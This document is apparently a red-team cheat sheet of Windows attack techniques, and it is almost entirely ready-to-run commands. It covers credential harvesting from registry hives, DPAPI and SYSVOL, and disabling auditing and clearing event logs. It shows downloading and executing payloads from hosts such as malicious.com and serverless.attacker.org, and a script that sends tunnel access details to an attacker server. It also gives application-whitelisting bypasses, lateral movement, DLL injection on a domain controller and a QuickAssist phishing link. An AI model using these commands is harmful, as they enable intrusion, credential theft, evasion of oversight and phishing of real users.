Windows

Windows - Helpful Binaries and Useful Tricks



Resources



Host Enumeration

OS Info
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
gpresult /z



Monitoring, Creds and Covering Tracks

Search for Creds in Registry and Config files
findstr /snip password *.xml *.ini *.txt
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Potential Credential Locations

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, vnc web.config php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP) SiteList.xml #McAfee ConsoleHost_history.txt #PS-History .gpg .pgp config.php elasticsearch.yml kibana.yml *.p12 *.der *.csr *.cer known_hosts id_rsa id_dsa *.ovpn anaconda-ks.cfg hostapd.conf rsyncd.conf cesi.conf supervisord.conf tomcat-users.xml *.kdbx KeePass.config Ntds.dit SAM SYSTEM FreeSSHDservice.ini access.log error.log server.xml ConsoleHost_history.txt setupinfo setupinfo.bak key3.db #Firefox key4.db #Firefox places.sqlite #Firefox “Login Data” #Chrome Cookies #Chrome Bookmarks #Chrome History #Chrome TypedURLsTime #IE TypedURLs #IE %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS1\Tempor1\Content.IE5\index.dat Search all of the proposed files:

cd C:\

dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse

DPAPI - Extracting Protected Data

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data is stored in the users directory and secured by user-specific master keys derived from the users password. The DPAPI keys used for encrypting the user’s RSA keys are stored under %APPDATA%\Microsoft\Protect{SID} directory, where {SID} is the Security Identifier of that user. The DPAPI key is stored in the same file as the master key that protects the users private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it usingdir from the cmd, but you can list it from PS).

https://github.com/login-securite/DonPAPI

TODO: Check out this .Net implementation and see if we can use it in Sorrowset/Sadrat https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1

# List secrets in vault
vaultcmd /listcreds:"Windows Credentials" /all

# Locations of masterlkey files
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}

# Hidden Protected Data
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Copy the keys and data to your machine and use impacket’s dpapi.py to decrypt the masterkey file from the path above and extract secrets

# (TODO: double check the syntax) Decrypt a master key
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD

# (TODO: double check the syntax) Obtain the backup keys & use it to decrypt a master key
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"

# (TODO: double check the syntax) Decrypt DPAPI-protected data using a master key
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
RegKeys - Offline SAM, SECURITY, SYSTEM Hives Credential Extraction

If you have offline access to a system drive, you can extract the SAM, SECURITY and SYSTEM Hives and use SYSTEM’s decryption keys to decrypt.

TODO: Check out this .Net implementation see if we can use it as a module in Sadrat and stop using reg.exe https://github.com/EncodeGroup/RegSave/tree/master

# For Local accounts On Victim
reg save HKLM\SAM C:\temp\sammy
reg save HKLM\SYSTEM c:\temp\syssy

# Try for AD accounts, too
reg save HKLM\SECURITY c:\temp\seccy
cd C:\Temp

# Start smbserver on Attacker machine with NETBIOS name 'JustAPrinter'
smbserver.py share . -smb2support -username mello -password sec

#  On Victim, Transfer txt files
net use \\JustAPrinter\share /u:mello sec
copy syssy \\JustAPrinter\share
copy sammy \\JustAPrinter\share
copy seccy \\JustAPrinter\share

# Dump Credentials
secretsdump.py -sam sammy -security seccy -system syssy LOCAL

RegKeys - Additional Registry Creds / Taking Ownership

# Take ownership of file 
takeown /f 'C:\some\file.txt' #Now the file is owned by you
icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access

# Use this with files that might contain credentials such as
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
c:\inetpub\wwwwroot\web.config
RegKeys - AlwaysInstallElevated - Current User and All Users
reg query "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" /v "AlwaysInstallElevated"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer" /v "AlwaysInstallElevated"
RegKeys - Security - Check What’s Audited, if WEF if used, if LSA Protection and CredGuard are enabled
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
RegKeys - WDigest & Cached Credentials Count
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Auditpol - Strategic Disable of Auditing
C:\Windows\System32\auditpol.exe /set /category:"Detailed Tracking" /success:disable /failure:disable
whoami /priv
net localgroup
C:\Windows\System32\auditpol.exe /set /category:"Detailed Tracking" /success:enable /failure:enable
Check Command History - Check for history and transcription logging
cat (Get-PSReadlineOption).HistorySavePath
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
Clear command and Powershell History
del /F /Q "%AppData%\Microsoft\Windows\Recent\CommandPrompt.pf"
del /F /Q "%UserProfile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
del /F /Q "%UserProfile%\Documents\PowerShell\ConsoleHost_history.txt"
Check Event Logs - Available Event Logs, Last 50 by Source
wevtutil el
wevtutil qe Application /c:50
wevtutil qe System /c:50
wevtutil qe Security /c:50
wevtutil qe ForwardedEvents /c:50
wevtutil qe Microsoft-Windows-Sysmon/Operational /c:50
Clear Event Logs - By Source
wevtutil el
wevtutil clear-log Security
wevtutil clear-log System
wevtutil clear-log Application
wevtutil clear-log Microsoft-Windows-Sysmon/Operational
wevtutil clear-log Microsoft-Windows-Security-Auditing



Recon

findstr.exe - Search SYSVOL for GPP Service Account Creds
findstr /S /I cpassword \\$domain\sysvol\$domain\policies\*.xml
findstr.exe - Find open shares, make a list, search for password in those shares by connecting and searching through then deleting each
@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
 C:
 NET USE Z: /delete /y
 net use z: “%%a
 Z:
 echo %%a
 echo %%a >> "C:\Temp\output_file.txt"
 if exist z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)
dsquery.exe - Server - Search Directory

dsquery https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb

C:\Windows\System32\dsquery.exe

dsquery subnet -limit 0

dsquery computer -limit 0

dsquery user -limit 0

dsquery group -limit 0

dsquery * -filter "(objectClass=trustedDomain)" -attr *

dsquery group -name "Domain Admins"

dsquery group -name *admin* -d 192.168.88.195

dsquery * -filter “(&(objectclass=group)(name=*admin*))” -attr name samaccountname -d 192.168.88.195

dsquery * -filter “(&(objectclass=group)(samaccountname=Domain Admins))” -attr name samaccountname member -d 192.168.88.195

# name and SAm of all windows machines
dsquery * -filter “(&(objectclass=computer)(name=*win*))” -attr name samaccountname -d 192.168.2.1

# admin groups 2.1 is the DC
dsquery group -name *admin* -d 192.168.2.1
dsquery * -filter “(&(objectclass=group)(name=*admin*))” -attr name samaccountname -d 192.168.2.1
dsquery * -filter “(&(objectclass=group)(samaccountname=Domain Admins))” -attr name samaccountname member -d 192.168.2.1
Portquery.exe - Server - Check remote port status
portqry -local

portqry -local -l [Logfile Name] -v

portqry -n [@IP] -e [PortToQuery]
Portquery.exe - Server - Script to check ports for list of IPs
@echo off
setlocal EnableDelayedExpansion

set "outputFile=portqry_results.txt"
set "portList=22,80,139,443,445,3389,389,8080"

:: Clear the output file
break > "%outputFile%"

for /f %%i in (iplist.txt) do (
    for %%p in (%portList%) do (
        echo Checking IP %%i on port %%p
        portqry -n %%i -e %%p >> "%outputFile%"
        echo. >> "%outputFile%"
    )
)

echo Results have been saved to %outputFile%



Downloading / Transfering Files

Certutil.exe - Transfer
certutil.exe -urlfetch -verify http://malicious.com/malware.exe "%AppData%\malware.exe"
certreq.exe - Transfer
certreq.exe -urlfetch -verify http://malicious.com/malware.exe "%AppData%\malware.exe"
bitsadmin.exe - Transfer, Execute as Jobs
bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe "%AppData%\malware.exe"

# Flagged as BITS Abuse copying CMD ouyt of System32
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\Temp32\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\Temp32\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset

# Remote download File
bitsadmin /create 2 & bitsadmin /addfile 2 https://live.sysinternals.com/autoruns.exe  c:\Temp32\autoruns.exe & bitsadmin /SetNotifyCmdLine 2 c:\Temp32\autoruns.exe NULL & bitsadmin /RESUME 2 & bitsadmin /Reset
bitsadmin.exe - Download, expand archive, open document
$path = "%USERPROFILE%\AppData\Local\joboffer.zip"; bitsadmin.exe /transfer "DirectXUpdate" https://recruiting.azurewebsites.net/careers/joboffer.zip $path; expand-archive $path; start-process offer.docx;
Configsecuritypolicy.exe tool - Download to Cache
ConfigSecurityPolicy.exe https://example.com/payload
Expand.exe - Download into ADS
expand.exe \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
robocopy.exe - Transfer
robocopy \\malicious-server\share "%AppData%" malware.exe
xcopy.exe - Transfer
xcopy \\malicious-server\share\malware.exe "%AppData%"
regsvr.exe - Transfer, can also execute
regsvr32 /s /n /u /i:http://malicious.com/malware.sct "%AppData%\scrobj.dll"
schtasks.exe - Transfer and Schedule Run
schtasks /create /tn "MaliciousTask" /tr "bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe %AppData%\malware.exe" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "ChromeUpdater"
iexpress.exe - Create Self-Extracting EXE
iexpress.exe /N /Q /C "malicious.bat" /M "malicious.sed"
Wusa.exe - Extract from .cab
wusa.exe C:\path\to\malicious.cab /extract:C:\Temp
reg.exe - Stash in the registry
reg add HKCU\Software\EncodedData /v Payload /t REG_SZ /d "BASE64_ENCODED_DATA"
reg query HKCU\Software\EncodedData /v Payload
Extrac32.exe - ADS, From Share, Regular Download
# Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

# Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe

# Copy the source file to the destination file and overwrite it
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
findstr.exe - ADS trick to copy exe into file, share and Search SYSVOL remotely
# To Disk -Searches for the string GoatsnakeReissuez, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L GoatsnakeReissuez c:\ADS\file.exe > c:\ADS\file.txt:file.exe

# To Share - Searches for the string GoatsnakeReissuez, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L GoatsnakeReissuez \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe

# Search Share - Search for stored password in Group Policy files stored on SYSVOL.
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml



RMM - Remote Management, Dev Tunnel and Monitoring Software

Tricks for using and abusing remote managemtn tools.

Dev Tunnel - Code.exe - Download and Create Tunnel, POST needed information to establish connection to attacker controller server/function
@echo off

set TEMPDIR=%APPDATA%\Microsoft\VSC
mkdir "%TEMPDIR%"
cd "%TEMPDIR%"
curl.exe -o vscode.zip https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
tar -xf vscode.zip
del vscode.zip

.\code.exe tunnel user logout
timeout /t 3
.\code.exe tunnel --accept-server-license-terms --name fudgetunnel > output.txt


timeout /t 3
setlocal enabledelayedexpansion
set "output="
for /f "delims=" %%a in (output.txt) do set "output=!output! %%a"
set "output=!output:~1!"
call :sendRequest
goto :eof

:sendRequest
curl.exe -X POST -H "X-Hook-Token: straylightsecurity" -H "Content-Type: application/json" --data-raw "{""sysinfo"":""%output%""}" https://serverless.attacker.org/logger
goto :eof
Dev Tunnel - Code.exe - VS Code CLI Expand from Share
cmd /Q /V /c "set TEMPDIR=%APPDATA%\Microsoft\VSC && set IP=10.0.0.10 && mkdir "%TEMPDIR%" && cd /d "%TEMPDIR%" && expand \\%IP%\share\code.cab && .\code.exe tunnel user logout && timeout /t 3 && .\code.exe tunnel --accept-server-license-terms --name fudge > output.txt && timeout /t 3 && for /f "delims=" %a in (output.txt) do set output=!output! %a && curl.exe -X POST -H "Content-Type: application/json" --data-raw "{""devtunnel"":""!output!""}" https://serverless.attacker.org/logger"
RMM - QuickAssist / TeamViewer UAC Prompts

QuickAssist has the same problem as TeamViewer with UAC prompts being hidden by black screen. This is a workaround to use RunAs. QuickAssist admins can natively authenticate using Live and EntraID accounts, local AD is not supported. You have to log in with a cloud account and elevate to domain or local admin from a RunAs shell. TeamViewer will let you use local accounts, like local admin users to log in, but you may run into the local user not allowed for remote logon error. This too can be handled by signing in with a cloud account and using runas.

QuickAssist - Elevate Shell - RunAs Local, AD or AzureAD Admin User
runas /user:Administrator cmd.exe

runas /user:DOMAIN\Administrator cmd.exe

runas /user:AzureAD\Administrator cmd.exe
QuickAssist - Disable SecPol - Disable Blackscreen UAC Prompts for the session
secpol.msc

1. Browse Security Settings - Local Policies - Security Options - User Account Control: Switch to the secure desktop

2. Disable it

3. Do your admin work 

4. before you exit the session, make sure the above security setting is set to 'Enable'
QuickAssist - Invoke-QuickAssist - Install and Start If Quick Assist is missing / If a user is stuck in OOBE during Autopilot

Source: https://mrshannon.wordpress.com/2022/07/06/screen-share-from-oobe-with-quick-assist/ Script: https://www.powershellgallery.com/packages/Invoke-QuickAssist/1.0.5/Content/Invoke-QuickAssist.ps1

# Shift + f10 if in OOBE, powerhell if you the hackarmanz today
powershell -ep bypass Install-Script -Name Invoke-QuickAssist -Force
Invoke-QuickAssist.ps1
QuickAssist - URI Handler for Phishing Emails
<a href="ms-quick-assist://">Click Here for Help with your Document</a>
Use your customer code <b><u>12345678</u></b> to connect with a live support agent ready to assist you.

Virtualization

If you’re admin on a managed device, you may be better off to install virtualization software and use that to stay out of the windows logs and bypass the AV. WSL isn’t the blindspot it used to be against Defender but QEMU portable is a good option that does not require an install.

WSL - Install - Usually Requires Reboot
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
wsl --install

wmic os where Primary='TRUE' reboot
WSL - Remove
wsl --unregister ubuntu
dism.exe /online /disable-feature /featurename:VirtualMachinePlatform
dism.exe /online /disable-feature /featurename:Microsoft-Windows-Subsystem-Linux
QEMU - QEMU Portable Emulator/Virtualizer

Portable virtualization and full system emulation tool.

Download QEMU zip with an iso, create a disk and start.

# Download QEMU
iwr https://github.com/MelloSec/RepeatOffender/raw/main/Tools/qemu.zip -o qemu.zip; Expand-Archive qemu.zip; cd qemu;

# Parrot ISO
# iwr https://deb.parrot.sh/parrot/iso/5.3/Parrot-security-5.3_amd64.iso -o parrot.iso

# Kali Live Boot
# iwr https://cdimage.kali.org/kali-2023.4/kali-linux-2023.4-live-amd64.iso -o kali.iso

# Kali QEMU Prebuilt VM
# iwr https://cdimage.kali.org/kali-weekly/kali-linux-2024-W01-qemu-amd64.7z -o kali.7z

# Ubuntu
iwr https://releases.ubuntu.com/focal/ubuntu-20.04.6-live-server-amd64.iso -o ubuntu.iso

# Start the GUI
# .\QemuManager.exe

# Create the disk for the VM
.\qemu\qemu-img.exe create -f qcow2 myvm.qcow2 20G

# Start VM with Iso
.\qemu\qemu-system-x86_64.exe -hda myvm.qcow2 -cdrom ubuntu.iso -boot d -m 2024
# .\qemu\qemu-system-x86_64.exe -hda myvm.qcow2 -cdrom parrot.iso -boot d -m 2024



Execution

settingsynchost.exe - execute - bat/arbritray background execution from %TEMP%

Compile an exe ‘settingsynchost.exe’ and mv it into %TEMP% then exec SettingsSyncHost.exe from system32

mv malware.exe settingsynchost.exe

mv .\settingsynchost.exe %TEMP%

C:\Windows\System32\SettingSyncHost.exe -LoadAndRunDiagScriptNoCab DoesntMatter
RegSvr
regsvr32 /s /n /u /i:http://malicious.com/malware.sct scrobj.dll
RegAsm
regasm.exe /U /codebase /nologo /silent /s "C:\Path\To\MaliciousAssembly.dll"
Installutil.exe - Basic Execution and Download to Cache
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe https://example.com/payload
CertOC.exe - DOWNLOAD / EXECUTE DLL
certoc.exe -GetCACAPS https://server.com/payload.dll
certoc.exe -LoadDLL payload.dll
Hh.exe - HTML Help - DOWNLOAD / EXECUTE
HH.exe http://some.url/payload.exe
HH.exe payload.exe
HH.exe c:\windows\system32\calc.exe
Control.exe

Execute evil.dll which is stored in an Alternate Data Stream (ADS) or CPL item called Microsoft.FolderOptions

control.exe c:\windows\tasks\file.txt:evil.dll

control.exe /name Microsoft.FolderOptions
ODBConf.exe - Load DLL as .rsp / maybe drivers
c:\windows\system32\odbcconf.exe -f file.rsp
forfiles - exec payload.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
forfiles.exe /p c:\windows\system32 /m notepad.exe /c .\payload.exe
forfiles - run file in path
forfiles.exe /p c:\windows\system32 /m calc.exe /c cmd.exe
ForFiles
cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c "$pwd\AIQ_pid_binary.exe"
Rundll32 - Execute
rundll32.exe malicious.dll,EntryPoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";
# Could execute javascript from a RunKey in the reg
Csript and Wscript - Execute
cscript malicious.vbs

wscript malicious.vbs
SchTask - Download and Run Local and Create Remote Task
# Local
schtasks /create /tn "MaliciousTask" /tr "bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe %AppData%\malware.exe" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "ChromeUpdater"
SchTask - Create Task on Remote Computer
schtasks /create /s RemoteComputerName /tn "RemoteTask" /tr "C:\Path\To\Script.bat" /sc daily /st 08:00
netsh - Open Firewall and Execute Script File
netsh.exe advfirewall firewall add rule name="Malicious Rule" dir=in action=allow program="C:\Windows\System32\netsh.exe" enable=yes
netsh.exe -c "exec malware.txt"
Atbroker.exe
ATBroker.exe /start $name
cmdkey.exe
cmdkey.exe /list
Esentutl.exe
esentutl.exe /y helloworld.exe /d $env:temp\$name /o

winword.exe - load dll

winword.exe /l dllfile.dll
powershell - Download & Execute a DLL as a CPL file w/ docx decoy
powershell -WindowStyle Hidden Invoke-WebRequest -Uri “http://192.168.0.122:8000/invoice.docx" -OutFile $env:USERPROFILE\Downloads\invoice.docx”; Invoke-Item $env:USERPROFILE\Downloads\invoice.docx”; Invoke-WebRequest -Uri “http://192.168.0.122:8000/invoice.cpl" -OutFile $env:USERPROFILE\Documents\invoice.cpl; Start-Process control.exe -FilePath $env:USERPROFILE\Documents\invoice.cpl
CONHOST - Indirect Execution
conhost ipconfig > ipconfig.txt
conhost whoami > whoami.txt
wt.exe - Indirect Execution
wt.exe calc.exe
CustomShellHost.exe - (Kiosk mode app)

we need to search $path for *.exe and rename that to explorer.exe move to/copy lolbin so that they are in the same folder and run CustomShellHost.exe. It will run explorer.exe

DNSAdmin / DNSCMD.exe - Remotely inject DLL on a DC by making dll a plug in for the DNS service
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
TTDInject.exe - Admin required and logged

Tttracer.exe creates a .pcap file in system32, and under the hood it seems it uses TTDInject.exe.

TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"

ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"



Living Off the Land Scripts

CL_loadassembly.ps1 - lolscript - Proxy Execution wit signed PS script
powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Main()"
CL_MutexVerifiers.ps1 - lolscript - Import and execute by calling runAfterCancelProcess runme.ps1
  • Ref: https://twitter.com/pabraeken/status/995111125447577600
    • Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
    • Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
    • Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
    • Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
    • Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
 . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1
winrm.vbs - Lateral Movement / Proxied Command Execution
winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985

winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985

%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty
Cscript/WinRM.vbs - Lateral Movement Command and Service
cscript.exe //nologo %windir%\System32\winrm.vbs invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://192.168.0.122:5985

cscript.exe //nologo %windir%\System32\winrm.vbs invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
CScript/Winrm.vbs - AWL Bypass
Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe
cp evil.xsl %SystemDrive%\BypassDir\WsmPty.xsl

%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty



Privelege Escalation Techniques

PrivEscCheck - Load In Memory and Run Extended Checks
# Extended Checks to the Console
powershell -ep bypass -c "Invoke-Expression (iwr -UseBasicParsing https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1).Content; Invoke-PrivescCheck -Extended"

# All In One with Output Files
powershell -ep bypass -c "Invoke-Expression (iwr -UseBasicParsing https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1).Content; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML"
Services - wmic - Look for unqouted service paths
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
Services - powershell - Look for unqouted service paths
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName
Servcies - Permissions
The permissions we are looking for on the folder are any one of the following three permissions:

(F) Full Control
(M) Modify
(W) Write
The user / group permissions we are looking for are the following:

# The user we are currently logged in as (%USERNAME%)
Authenticated Users
Everyone
BUILTIN\Users
NT AUTHORITY\INTERACTIVE

Look for folders with unquoted service paths that we or groups we're in can M, F or W
icacls.exe - cmd - Check Permissions
icacls C:\
icacls "C:\Program Files"
icacls "C:\Program Files\Jankins"
get-acl - powershell - check folder permissions
Get-Acl -Path C:\ | Format-List
Get-Acl -Path "C:\Program Files" | Format-List
Get-Acl -Path "C:\Program Files\Jankins" | Format-List
accesscheck.exe - cmd
.\accesschk64.exe -wvud "C:\" -accepteula
.\accesschk64.exe -wvud "C:\Program Files" -accepteula
.\accesschk64.exe -wvud "C:\Program Files\Jankins" -accepteula
Windows Exploit Suggester - NG
git clone https://github.com/bitsadmin/wesng.git --depth 1

systeminfo.exe > systeminfo.txt

# Update
wes.py --update

# Only criticals, color
wes.py systeminfo.txt -c -s critical;

# Only vulns w/ exploits, color
wes.py systeminfo.txt -e -c
Kerberos Sessions - Check Kerberos Information
qwinsta
klist sessions



Useful Tricks and Combo-breakers

RPCPing.exe - Send Password Hash Back to rpcserver.py
# Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 127.0.0.1 -t ncacn_np

# Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 192.168.1.10 -ncacn_np

# Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
AcroRdr32 - Replace component Exe for Proxy Execution when starting Acrobat

Hijack RdrCEF.exe with a payload executable to launch when opening Adobe

cp malware.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"
FileHistory.exe - ADM Injection, create config pointing to uevmonitor.dll, copy FileHistory and execute
Need a user writable directory, and can bring your own FileHistory rather than copy out of System32
cd "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF"
notepad filehistory.exe.config

curl.exe -o uevmonitor.dll https://attacker.azurewebsites.net/assets/uevmonitor
# curl.exe -o FileHistory.exe https://attacker.azurewebsites.net/assets/filehistory

cp C:\windows\system32\filehistory.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\FileHistory.exe"

.\FileHistory.exe
PSR.exe - Start invisilb escreen capture without a GUI on target
C:\Windows\System32\psr.exe /start /output C:test.zip /sc 1 /gui 0

# Stop
